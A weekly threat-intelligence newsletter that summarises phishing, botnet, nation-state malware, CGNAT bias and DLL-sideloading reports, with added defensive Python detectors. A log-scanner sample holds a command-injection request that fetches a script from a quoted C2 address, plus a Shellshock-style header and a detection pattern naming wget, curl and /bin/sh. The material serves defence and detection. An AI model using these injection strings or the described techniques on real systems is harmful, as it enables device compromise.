Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
New Phishing Campaign Abuses Cloudflare Pages and ZenDesk to Harvest Credentials
(TLP: CLEAR) Security researchers have uncovered a large-scale phishing campaign exploiting trusted cloud hosting infrastructure to conduct credential theft operations against enterprise and consumer targets. The campaign leverages Cloudflare Pages and ZenDesk platforms to create convincing fraudulent customer support portals, with analysts identifying over 600 malicious domains registered under the *.pages[.]dev domain structure. According to researchers, threat actors employ typosquatting techniques to mimic legitimate brand support sites, creating domains that closely resemble authentic services in order to trick victims into lowering their defenses. Furthermore, the phishing operation utilizes artificial intelligence (AI) to generate convincing fraudulent web pages that incorporate embedded live chat interfaces. These chat systems are staffed by malicious human operators who engage directly with victims, maintaining the deception by requesting phone numbers and email addresses under the pretense of providing technical support. Once sufficient personal information is collected, the operators instruct victims to install Rescue, a legitimate remote monitoring and management tool that becomes a dangerous vector when deployed on compromised systems. Installation of this software grants the attackers complete remote access to the victim’s device, enabling systematic harvesting of sensitive data and account credentials. The threat actors further expand their attack surface by abusing Google Site Verification and Microsoft Bing Webmaster tokens for single sign-on poisoning. The campaign’s primary motivation appears to be financially driven account takeover and fraud operations, positioning this as a significant threat to both enterprise organizations and individual users.
(TLP: CLEAR) Comments: This phishing campaign demonstrates a concerning evolution in social engineering tactics where adversaries weaponize the trust placed in legitimate cloud infrastructure providers. The use of Cloudflare Pages and ZenDesk provides attackers with free, reliable hosting that carries the implicit trust of a major CDN provider, while the incorporation of live human operators adds a layer of sophistication that automated detection systems struggle to identify. The decision to abuse legitimate remote access tools like Rescue rather than deploying traditional malware allows the operation to bypass many endpoint detection systems, as the software itself is benign until misused. The scale of the operation, with over 600 malicious domains identified, suggests either a well-resourced criminal organization or a malware-as-a-service operation providing phishing infrastructure to multiple threat actors. The incorporation of AI-generated content to create convincing fake support pages represents a worrying trend where artificial intelligence lowers the technical barrier for conducting sophisticated social engineering attacks, potentially enabling less skilled threat actors to launch credible campaigns that would previously have required significant manual effort and linguistic expertise.
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:
- Phishing: Sites known to host applications that maliciously collect personal or organizational information, including credential harvesting scams. These domains may include typo-squats – or close lookalikes of common domains. PDNS can protect users from accidentally connecting to a potentially malicious link.
- Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.
- Domain generation algorithms: Sites with programmatically generated domain names that are used by malware to circumvent static blocking. Advanced malware – including some botnets – depend on the ability to communicate with command and control (C2) infrastructure. Cyber threat actors use domain generation algorithms (DGAs) for malware to circumvent static blocking – either by domain name or IP – through programmatically generating domain names according to a pre-set seed. PDNS can offer protection from malware DGAs by analyzing every domain’s textual attribute and tagging those associated with known DGA attributes, such as high entropy.
- Content filtering: Sites whose content is in certain categories that are against an organization’s access policies. Although an ancillary benefit to malware protection, PDNS can use a categorization of various domains’ use cases (e.g., ‘gambling’) and warn or block on those that are deemed a risk for a given environment.”
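The two PDNS categories most relevant to the campaign above are the phishing typosquats (brand names on *.pages.dev tenants) and the entropy-based DGA tagging CISA describes. The following added example, which is not code from the report, CISA, or any Vercara product, shows how a resolver-side classifier can score a queried name against both: it folds digit-for-letter substitutions before comparing the tenant-controlled label to a brand list, and it applies an entropy and vowel-ratio test for DGA-like labels. The brand list, allowlisted domains, hosted-platform suffix list and thresholds are all constructed assumptions.

```python
import math
from collections import Counter

# Constructed brand list, allowlisted brand domains and hosted-platform suffixes
# (assumptions for this example, not data from the report).
BRANDS = ("microsoft", "paypal", "zendesk", "cloudflare")
LEGIT_DOMAINS = ("microsoft.com", "paypal.com", "zendesk.com", "cloudflare.com")
HOSTED_SUFFIXES = ("pages.dev",)  # platforms where the tenant controls the subdomain
# Digit-for-letter substitutions commonly used in lookalike names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})
VOWELS = set("aeiou")


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking DGA labels score high, words score low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character typosquats of a brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def controlled_label(fqdn: str) -> str:
    """The label the registrant (or platform tenant) actually chose."""
    for suffix in HOSTED_SUFFIXES:
        if fqdn.endswith("." + suffix):
            return fqdn[: -len(suffix) - 1].split(".")[-1]
    parts = fqdn.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(fqdn: str) -> tuple:
    """Return (category, detail): clean, lookalike, typosquat or dga."""
    fqdn = fqdn.lower().rstrip(".")
    if any(fqdn == d or fqdn.endswith("." + d) for d in LEGIT_DOMAINS):
        return ("clean", "allowlisted brand domain")
    label = controlled_label(fqdn)
    for token in label.replace("_", "-").split("-"):
        folded = token.translate(HOMOGLYPHS)
        for brand in BRANDS:
            if token == brand:  # brand name used verbatim on a non-brand domain
                return ("lookalike", brand)
            if folded == brand or (len(brand) >= 5 and levenshtein(folded, brand) == 1):
                return ("typosquat", brand)
    vowel_ratio = sum(ch in VOWELS for ch in label) / max(len(label), 1)
    entropy = shannon_entropy(label)
    if len(label) >= 10 and entropy >= 3.5 and vowel_ratio <= 0.25:
        return ("dga", f"entropy={entropy:.2f}")
    return ("clean", "")


if __name__ == "__main__":
    for name in ("paypa1-support.pages.dev", "microsoft-support.pages.dev",
                 "xk3jq9v2mz8t.pages.dev", "zendesk.com", "example.org"):
        print(name, classify(name))
```

The point of `controlled_label` is that on a shared hosting platform the registrable domain (pages.dev) is not the attacker's choice; the subdomain is, so that is the label worth scoring. A production feed would replace the constructed brand list with the organization's own protected brands and tune the entropy threshold against real query history.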
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), receives DNS queries from enterprise users and other on-LAN devices and inspects the DNS response for indicators of malicious activity such as phishing, ransomware, and acceptable usage policy violations.
Source: https://cybersecuritynews.com/phishing-attack-that-abuses-cloudflare/
The RondoDox Botnet Version 2 Expands Exploitation Arsenal by 650%
(TLP: CLEAR) Recent intelligence reporting indicates the RondoDox botnet has undergone a significant evolution, expanding from a limited two-exploit DVR-targeting malware into a sophisticated threat with over 75 distinct exploitation vectors capable of compromising both legacy internet-of-things (IoT) devices and modern enterprise software applications. Originally documented by FortiGuard Labs in September 2024, the newly discovered RondoDox v2 variant was detected on October 30, 2025, through honeypot telemetry when its infrastructure began receiving automated exploitation attempts from IP address 124.198.131.83 originating from New Zealand. According to security researchers, the malware’s sophisticated attack pattern was highly volumetric, deploying 75 distinct exploit payloads in rapid succession, each attempting command injection vectors targeting router and IoT vulnerabilities. All payloads downloaded malicious scripts from the command-and-control server located at 74.194.191.52. Notably, the threat actor embedded an open attribution signature directly into User-Agent strings, marking a departure from the anonymous operational security typically employed by botnet operators. Security researchers at Beelzebub identified the malware through their AI-native deception platform, which captured the complete attack chain and enabled comprehensive technical analysis of the botnet’s capabilities. RondoDox v2 targets an extensive range of vulnerable devices spanning multiple vendor ecosystems and over a decade of CVE history. The exploitation arsenal includes critical vulnerabilities such as CVE-2014-6271 (Shellshock), CVE-2018-10561 affecting Dasan GPON routers, CVE-2021-41773 targeting Apache HTTP Server, and CVE-2024-3721 exploiting TBK DVR systems.
The command-and-control (C2) infrastructure operates on compromised residential IP addresses distributed across multiple autonomous system numbers, providing resilience and evasion capabilities that make traditional blocking strategies less effective. The dropper script showcases sophisticated evasion and persistence techniques, immediately disabling SELinux and AppArmor security frameworks upon execution. The script then performs aggressive competitor elimination, systematically killing processes associated with cryptocurrency miners like xmrig and other known botnet families, ensuring resource monopolization while reducing detection probability. As for the botnet’s distributed-denial-of-service (DDoS) capabilities, they include HTTP flood attacks that mimic gaming traffic, UDP floods, TCP SYN floods, and protocol mimicry for OpenVPN, WireGuard, and popular gaming platforms including Minecraft, Fortnite, and Discord.
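Because the botnet's C2 sits on rotating residential addresses, matching only the two IP addresses quoted above goes stale quickly; the more durable signal in web-server or honeypot logs is the shape of the request: command-injection characters in the URI or User-Agent and a fetch of a script from an outside host. The following added example, not code from the report or from Beelzebub, parses combined-format access log lines and tags each with the indicators it matches. The two IP addresses are the IoCs quoted in the report; the log lines, log format and injection markers are constructed assumptions.

```python
import re
from urllib.parse import unquote

# IoCs quoted in the report above: scanning source and download/C2 host.
IOC_IPS = {"124.198.131.83", "74.194.191.52"}
C2_IP = "74.194.191.52"

# Combined log format (assumed): src ident user [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Shell metacharacters and downloader verbs that do not belong in a device's
# management URI or in a browser User-Agent (constructed marker list).
INJECTION_RE = re.compile(r'(;|\|\||\$\(|`|\bwget\b|\bcurl\b|/bin/sh|\(\)\s*\{)')


def analyze_line(line: str):
    """Return a record with the matched indicator tags, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %xx escapes first so encoded metacharacters are still seen.
    decoded = unquote(m["req"]) + " " + unquote(m["ua"])
    tags = []
    if m["src"] in IOC_IPS:
        tags.append("ioc-source-ip")
    if INJECTION_RE.search(decoded):
        tags.append("command-injection")
    if C2_IP in decoded:
        tags.append("c2-reference")
    return {"src": m["src"], "ts": m["ts"], "request": m["req"], "tags": tags}


def scan(lines):
    """Records for every line that matched at least one indicator."""
    return [r for r in map(analyze_line, lines) if r and r["tags"]]


# Constructed sample lines: one scan hit, one benign request, one Shellshock-style UA.
SAMPLE_LOG = [
    '124.198.131.83 - - [30/Oct/2025:10:00:01 +0000] '
    '"GET /cgi-bin/;wget%20http://74.194.191.52/x.sh HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [30/Oct/2025:10:00:02 +0000] '
    '"GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [30/Oct/2025:10:00:03 +0000] '
    '"GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :; }; echo test"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ts"], rec["src"], rec["tags"])
```

The third sample line carries no IoC address at all and is still flagged, which is the behaviour a detection should have once the operator moves to fresh residential IPs; the IoC tag then serves as corroboration rather than the primary trigger.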
(TLP: CLEAR) Comments: The dramatic evolution of RondoDox from a narrowly focused DVR botnet to a comprehensive exploitation platform represents a significant escalation in the IoT threat landscape. The 650 percent increase in exploitation capabilities demonstrates a strategic shift where botnet operators are moving beyond opportunistic device compromise toward building versatile platforms capable of targeting both legacy infrastructure and modern enterprise systems within a single campaign. The inclusion of enterprise-focused vulnerabilities like Apache HTTP Server exploits alongside traditional IoT targets suggests the threat actors may be positioning RondoDox for more lucrative operations such as ransomware deployment or corporate espionage rather than limiting themselves to DDoS-for-hire services. The open attribution signature embedded in User-Agent strings represents an unusual operational security decision that could indicate either a remarkably confident threat actor or an intentional false flag operation designed to mislead attribution efforts. The comprehensive architecture support, spanning everything from modern x86_64 systems to legacy SPARC processors, demonstrates an understanding that critical infrastructure and industrial control systems often rely on outdated hardware that remains vulnerable to decade-old exploits. The use of compromised residential IP addresses for command-and-control infrastructure rather than traditional VPS or bulletproof hosting providers indicates sophisticated understanding of detection evasion, as residential IPs are far less likely to appear on threat intelligence blocklists and can blend seamlessly with legitimate traffic patterns.
(TLP: CLEAR) Recommended best practices/regulations: NIST PCI-DSS V4.0 Section 6.4.1: “For public-facing web applications, new threats and vulnerabilities are addressed on an ongoing basis and these applications are protected against known attacks as follows:
“Reviewing public-facing web applications via manual or automated application vulnerability security assessment tools or methods as follows:
- By an entity that specializes in application security.
- Including, at a minimum, all common software attacks in Requirement 6.2.4.
- All vulnerabilities are ranked in accordance with requirement 6.3.1.
- All vulnerabilities are corrected.
- The application is re-evaluated after the corrections
OR
- Installing an automated technical solution(s) that continually detects and prevents web-based attacks as follows:
- Installed in front of public-facing web applications to detect and prevent web-based attacks.
- Actively running and up to date as applicable.
- Generating audit logs.
- Configured to either block web-based attacks or generate an alert that is immediately investigated.”
(TLP: CLEAR) DigiCert: Digicert’s Web Application Firewall, UltraWAF, equips your company with adaptable security features to counteract the most significant network and application-layer threats, including SQL injection, XSS, and DDoS attacks. Its always-on security posture, combined with cloud-based scalability, ensures comprehensive protection against the OWASP top 10, advanced bot management, and vulnerability scanning, allowing you to effectively shield your critical and customer-facing applications from emerging threats.
Digicert’s UltraDDoS Protect is overseen by a 24/7 Security Operations Center (SOC) staffed by senior-level DDoS mitigation professionals who have the expertise, skills, and tools to thwart even the most sophisticated DDoS attacks.
Source: https://cybersecuritynews.com/rondodox-botnet-updated-their-arsenal/
Nation-State Threat Actor Deploys Airstalk Malware in Suspected Supply Chain Attack
(TLP: CLEAR) Security researchers from Palo Alto Networks Unit 42 have identified a sophisticated nation-state threat actor distributing a new malware family dubbed “Airstalk” through what appears to be a supply chain attack targeting the business process outsourcing (BPO) sector. According to researchers, the threat actor, tracked as “CL-STA-1009”, has developed malware that weaponizes the AirWatch mobile device management API, now marketed as Workspace ONE Unified Endpoint Management. The malware exists in both PowerShell and .NET variants, implementing a multi-threaded command-and-control (C2) tunnel that allows attackers to capture screenshots, harvest cookies, browser history, bookmarks, and user credentials from web browsers. Researchers indicated threat actors are leveraging stolen certificates to sign some of the malicious artifacts, with the .NET variant demonstrating significantly more advanced capabilities than its PowerShell counterpart.
Furthermore, the PowerShell variant utilizes the “/api/mdm/devices/” endpoint for command-and-control communications, exploiting the custom attributes feature in the API as a dead drop resolver for storing information necessary for interacting with the attacker infrastructure. Upon execution, the backdoor initializes contact by transmitting a “CONNECT” message and awaiting a “CONNECTED” server response, subsequently receiving various tasks in the form of “ACTIONS” messages with execution results returned via “RESULT” messages. The PowerShell version supports seven distinct actions including screenshot capture, Chrome cookie extraction, Chrome profile enumeration, bookmark collection, browser history harvesting, file system enumeration within user directories, and self-removal capabilities. For large data exfiltration operations, the malware leverages the blobs feature of the AirWatch MDM API to upload content as new blob objects. The .NET variant significantly expands operational capabilities by targeting Microsoft Edge and Island enterprise browser in addition to Chrome, while attempting to masquerade as an AirWatch Helper utility. This version implements three additional message types including MISMATCH for version errors, DEBUG for diagnostic messages, and PING for beaconing functionality. The malware employs three separate execution threads for managing command-and-control tasks, exfiltrating debug logs, and maintaining beacon communications with the control server. Enhanced commands include UpdateChrome, FileMap, a non-implemented RunUtility function, EnterpriseChromeProfiles, UploadFile, OpenURL, Uninstall, EnterpriseChromeBookmarks, EnterpriseIslandProfiles, UpdateIsland, and ExfilAlreadyOpenChrome. While the PowerShell variant implements scheduled task persistence, the .NET version lacks this mechanism. 
Some .NET samples are signed with a certificate issued to Aoteng Industrial Automation (Langfang) Co., Ltd., which researchers assess as likely stolen, with early compilation timestamps dating back to June 28, 2024.
(TLP: CLEAR) Comments: The Airstalk campaign represents a sophisticated nation-state operation that demonstrates advanced understanding of mobile device management infrastructure and the business process outsourcing ecosystem. The decision to weaponize legitimate MDM APIs rather than developing traditional command-and-control infrastructure provides significant operational security advantages, as traffic between enrolled devices and MDM servers is expected and often encrypted, making detection substantially more difficult for network security monitoring systems. The targeting of enterprise browsers like Island, which is specifically designed for secure access to business applications, strongly suggests the threat actors are pursuing high-value targets within the BPO sector where access to client credentials and session tokens could enable lateral movement into numerous downstream organizations. Furthermore, a single compromise within a BPO provider could grant attackers access to dozens or hundreds of client organizations that rely on these outsourced services. Additionally, the use of a stolen code-signing certificate from a Chinese industrial automation company indicates either direct compromise of that organization or access to black market certificate trading operations, both of which suggest substantial resources and planning. The evolutionary development from PowerShell to .NET variants, with the latter showing significantly expanded capabilities, indicates an active development cycle where the threat actors are iterating on their toolset based on operational requirements and defensive responses.
(TLP: CLEAR) Recommended best practices/regulations: Request For Comment 9424 “Indicators of Compromise (IoCs) and Their Role in Attack Defence” Section 3.4.2: “Deployment: IoCs can be particularly effective at mitigating malicious activity when deployed in security controls with the broadest impact. This could be achieved by developers of security products or firewalls adding support for the distribution and consumption of IoCs directly to their products, without each user having to do it, thus addressing the threat for the whole user base at once in a machine-scalable and automated manner. This could also be achieved within an enterprise by ensuring those control points with the widest aperture (for example, enterprise-wide DNS resolvers) are able to act automatically based on IoC feeds.” Protective DNS solutions incorporate a wide variety of IoC feeds to detect and block malware and other abuse at the network level for many users.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.
Source: https://thehackernews.com/2025/10/nation-state-hackers-deploy-new.html
Curly COMrades Weaponizes Windows Hyper-V to Conceal Linux Virtual Machine for EDR Evasion
(TLP: CLEAR) Recent intelligence reporting has highlighted the threat actor tracked as “Curly COMrades” exploiting Windows virtualization technologies to bypass endpoint detection and response (EDR) solutions while maintaining persistent access in targeted systems. According to recent investigations from Bitdefender in collaboration with Georgia CERT, the threat actor has been observed enabling the Hyper-V role on targeted victim systems in order to deploy a minimalistic Alpine Linux-based virtual machine that hosts custom malware components. This hidden virtualized environment, consuming only 120MB of disk space and 256MB of memory, hosted the threat actor’s custom reverse shell designated CurlyShell and a reverse proxy tool called CurlCat. Curly COMrades was first documented by Bitdefender in August 2025 during analysis of attacks targeting Georgia and Moldova, with the activity cluster assessed as active since late 2023 and operating with interests aligned with Russian strategic objectives. Previous campaigns deployed multiple tools including CurlCat for bidirectional data transfer, RuRat for persistent remote access, Mimikatz for credential harvesting, and a modular .NET implant dubbed MucorAgent with development history extending back to November 2023. The follow-up analysis identified additional tooling associated with the threat actor alongside attempts to establish long-term access by weaponizing Hyper-V on compromised Windows 10 hosts to create a hidden remote operating environment. By isolating malware and its execution environment within a virtual machine, the attackers effectively bypassed many traditional host-based endpoint detection and response solutions, as the malicious activity occurs within the guest operating system rather than the monitored Windows host. The threat actor demonstrated persistent determination to maintain reverse proxy capabilities, repeatedly introducing new tooling into compromised environments.
Beyond using established tools like Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, and SSH-based methods for proxy and tunneling operations, Curly COMrades also employed various custom tools including a PowerShell script designed for remote command execution and CurlyShell, a previously undocumented ELF binary deployed within the virtual machine environment to provide persistent reverse shell access. Written in C++, CurlyShell executes as a headless background daemon to establish connections with command-and-control infrastructure and launch reverse shells, enabling threat actors to execute encrypted commands on compromised systems.
(TLP: CLEAR) Comments: The Curly COMrades campaign represents a significant evolution in threat actor evasion techniques, demonstrating how threat actors are weaponizing legitimate enterprise infrastructure components to create detection-resistant operational environments. The decision to deploy a minimalistic Alpine Linux virtual machine within Windows Hyper-V environments creates a complete isolation environment between the malicious activity and the host-based security components that most endpoint detection solutions rely upon. Traditional EDR products monitor system calls, process creation, network connections, and file operations on the host operating system, but virtualization creates a hardware abstraction layer that prevents these monitoring capabilities from observing activity within the guest operating system. The extremely small footprint of 120MB disk and 256MB memory demonstrates careful operational planning to minimize the forensic artifacts and performance impact that might alert administrators to the presence of unauthorized virtual machines. The aforementioned campaign should serve as a critical warning that virtualization technologies, while essential for modern enterprise infrastructure, create significant blind spots for traditional endpoint security solutions and require specialized monitoring approaches that can instrument hypervisor-level activity or employ network-based detection methods that observe malicious behavior regardless of the execution environment.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware, phishing, and other abuses:
- The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.
- The Categories Engine uses Digicert-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click.
- The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.
- The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.
Source: https://thehackernews.com/2025/11/hackers-weaponize-windows-hyper-v-to.html
ISPs More Likely to Throttle Netizens Who Connect Through Carrier-Grade NAT
(TLP: CLEAR) A recent study published at the end of October 2025 revealed how Carrier-Grade Network Address Translation (CGNAT) infrastructure creates unintended systemic bias in internet security operations, ultimately impacting users in various regions. The research addresses how historical IPv4 address allocation patterns have created persistent inequities that manifest in modern network operations. When IPv4 address exhaustion became apparent, engineers developed Network Address Translation to enable multiple devices to share single IPv4 addresses, with standard NAT implementations supporting tens of thousands of devices. However, internet service providers typically operate at scales requiring Carrier-Grade NAT implementations that can handle over one hundred devices per IPv4 address while scaling to serve millions of users. This technology proves valuable for carriers in countries that missed early IPv4 allocations, with Cloudflare’s research indicating that carriers in Africa and Asia employ CGNAT more extensively than those on other continents due to their smaller pools of available IPv4 resources. The researchers identified significant operational fallout stemming from the architectural characteristic that hundreds or thousands of clients can appear to originate from a single IP address when utilizing CGNAT infrastructure. This creates situations where IP-based security systems may inadvertently block or throttle large groups of users as a result of a single user behind the CGNAT infrastructure engaging in malicious activity, effectively penalizing numerous innocent users alongside the actual abuser. Traditional abuse-mitigation techniques including blocklisting and rate-limiting assume a one-to-one relationship between IP addresses and users, where malicious activity detection triggers blocking of the offending IP address to prevent further abuse.
Because CGNAT deployment is more prominent and heavily utilized in Africa and Asia, the researchers posit that CGNAT serves as an unseen source of bias on the internet, with these biases becoming more pronounced wherever there are numerous users but few addresses available, such as in developing regions. To validate this hypothesis, the researchers employed traceroute, WHOIS, reverse DNS pointer records, and existing lists of VPN and proxy IP addresses to identify CGNAT implementations, yielding a dataset of labeled IPs including more than 200,000 CGNAT addresses, 180,000 VPN and proxy addresses, and close to 900,000 other relevant IPs. Analysis of this dataset combined with Cloudflare’s bot activity data revealed indicators of bias, where non-CGNAT IPs demonstrate higher likelihood of being bots than CGNAT IPs, yet internet service providers are more likely to throttle traffic from CGNAT infrastructure. Specifically, despite bot scores indicating traffic is more likely originating from human users, CGNAT IPs are subject to rate limiting three times more frequently than non-CGNAT IPs, likely because multiple users sharing the same public IP address increases the probability that legitimate traffic gets caught by customers’ bot mitigation and firewall rules.
(TLP: CLEAR) Comments: This investigation highlights a critical consequence of IPv4 address exhaustion, where technical solutions to address scarcity create systematic disadvantages for users in developing regions who already face numerous digital divide challenges. The three-fold increase in rate-limiting applied to CGNAT traffic compared to direct IP connections represents a significant degradation in service quality that disproportionately affects users in Africa and Asia, effectively creating a multi-tiered internet where users’ experience and access are determined by the historical accident of whether their country secured adequate IPv4 allocations decades ago. This condition exemplifies how technical debt and deferred migrations create compounding issues, as CGNAT was designed as a temporary bridging technology to maintain IPv4 operation until the world transitioned to IPv6, but the notorious difficulty of that transition has resulted in CGNAT becoming a permanent feature of internet infrastructure in many regions. The security implications extend beyond mere rate-limiting inconvenience, as the aggregation of numerous users behind single IP addresses fundamentally breaks the assumption underlying most IP-based security controls that there exists a meaningful correlation between IP addresses and individual actors. This creates a perverse situation where security teams attempting to block malicious activity inevitably create collateral damage affecting potentially thousands of innocent users who happen to share network infrastructure with an attacker. Organizations implementing security controls should recognize that IP-based blocking and rate-limiting strategies, while convenient and efficient, create potential systematic bias against users in regions that rely heavily on CGNAT infrastructure.
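The collateral-damage effect described above is easy to reproduce in a simulation. The following added example, not code from the study, Cloudflare, or any Vercara product, runs the same constructed request stream through a classic per-IP rate limiter and through a variant that keys requests from operator-labelled CGNAT addresses by an application-level client identifier instead. The CGNAT address list, the request budgets, and the existence of a client identifier the limiter can read (for example a session cookie) are assumptions for the example.

```python
from collections import defaultdict

# Constructed assumptions: one operator-labelled CGNAT egress address, a
# per-window budget, and an application-level client identifier.
CGNAT_IPS = {"203.0.113.10"}
PER_IP_LIMIT = 20        # requests per window from one address
PER_CLIENT_LIMIT = 20    # requests per window from one client behind a shared address
ABUSER = "client-abuser"


def build_stream():
    """Constructed traffic: 40 innocent clients behind one CGNAT address send
    one request each, interleaved with an abuser that sends 100 in total,
    plus a user on a dedicated address sending 5."""
    reqs = []
    for i in range(40):
        reqs.append(("203.0.113.10", f"client-{i}"))
        reqs.extend([("203.0.113.10", ABUSER)] * 2)
    reqs.extend([("203.0.113.10", ABUSER)] * 20)
    reqs.extend([("198.51.100.7", "direct-user")] * 5)
    return reqs


def naive_limiter(reqs):
    """Classic per-IP budget; returns (ip, client) for every rejected request."""
    counts = defaultdict(int)
    rejected = []
    for ip, client in reqs:
        counts[ip] += 1
        if counts[ip] > PER_IP_LIMIT:
            rejected.append((ip, client))
    return rejected


def cgnat_aware_limiter(reqs):
    """Same budget, but addresses known to be CGNAT are keyed per client, so one
    abuser cannot exhaust the budget shared by everyone behind the NAT."""
    counts = defaultdict(int)
    rejected = []
    for ip, client in reqs:
        shared = ip in CGNAT_IPS
        key = (ip, client) if shared else (ip, None)
        limit = PER_CLIENT_LIMIT if shared else PER_IP_LIMIT
        counts[key] += 1
        if counts[key] > limit:
            rejected.append((ip, client))
    return rejected


def collateral(limiter, reqs):
    """(distinct innocent clients rejected, abuser requests rejected)."""
    rejected = limiter(reqs)
    innocents = {c for _, c in rejected if c != ABUSER}
    abuser_hits = sum(1 for _, c in rejected if c == ABUSER)
    return len(innocents), abuser_hits


if __name__ == "__main__":
    stream = build_stream()
    print("naive      :", collateral(naive_limiter, stream))
    print("cgnat-aware:", collateral(cgnat_aware_limiter, stream))
```

With the constructed stream the naive limiter rejects 33 of the 40 innocent clients while the CGNAT-aware one rejects none and still cuts the abuser off at the same budget. The caveat is that the client identifier must be something the abuser cannot mint at will; where it is, a second, higher ceiling on the address as a whole is still needed so a shared address cannot be used to bypass the limiter entirely.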
(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SC-22: “ARCHITECTURE AND PROVISIONING FOR NAME/ADDRESS RESOLUTION SERVICE”: Control:
- Ensure the systems that collectively provide name/address resolution service for an organization are fault-tolerant and implement internal and external role separation.
- Discussion: Systems that provide name and address resolution services include domain name system (DNS) servers. To eliminate single points of failure in systems and enhance redundancy, organizations employ at least two authoritative domain name system servers—one configured as the primary server and the other configured as the secondary server. Additionally, organizations typically deploy the servers in two geographically separated network subnetworks (i.e., not located in the same physical facility). For role separation, DNS servers with internal roles only process name and address resolution requests from within organizations (i.e., from internal clients). DNS servers with external roles only process name and address resolution information requests from clients external to organizations (i.e., on external networks, including the Internet). Organizations specify clients that can access authoritative DNS servers in certain roles (e.g., by address ranges and explicit lists).”
(TLP: CLEAR) DigiCert: Digicert’s UltraDNS solutions include 2 separate and diverse authoritative resolution platforms for an aggregate 47 deployment nodes. UltraDNS provides resiliency, performance and advanced features such as load-balancing, monitored failover, automated DNSSEC signing and geographic resolution.
Source: https://www.theregister.com/2025/11/03/cloudflare_cgnat_bias_research/
Threat Actors Exploit OneDrive Through Advanced DLL Technique
(TLP: CLEAR) Security researchers at Kas-sec have documented a sophisticated cyber-attack technique that exploits Microsoft’s OneDrive application through Dynamic Link Library (DLL) sideloading, enabling threat actors to execute malicious code while evading detection mechanisms. The attack leverages a weaponized version.dll file to hijack legitimate Windows processes while maintaining persistence on compromised systems. According to reporting, DLL sideloading exploits the Windows library-loading mechanism by deceiving legitimate applications into loading a malicious DLL instead of the authentic system library. According to the security advisory, attackers place a crafted version.dll file in the same directory as OneDrive.exe, taking advantage of the application’s dependency search order where applications preferentially load libraries from their local directory before searching system directories. When OneDrive.exe launches, it automatically loads the malicious DLL from its local directory prior to checking system paths. The technique specifically targets version.dll because many Windows applications, including OneDrive, rely on this library to retrieve file version information. By positioning the malicious DLL strategically, attackers can execute code within the trusted context of a digitally signed Microsoft application, effectively bypassing security controls that monitor suspicious process creation or execution. To maintain operational stealth and prevent application crashes that might alert users or security software, attackers implement DLL proxying techniques where the malicious version.dll exports the same functions as the legitimate library, forwarding legitimate function calls to the original Windows System32 version.dll while executing malicious operations in the background. This dual functionality ensures OneDrive.exe continues operating normally, reducing the likelihood of detection by users or security software.
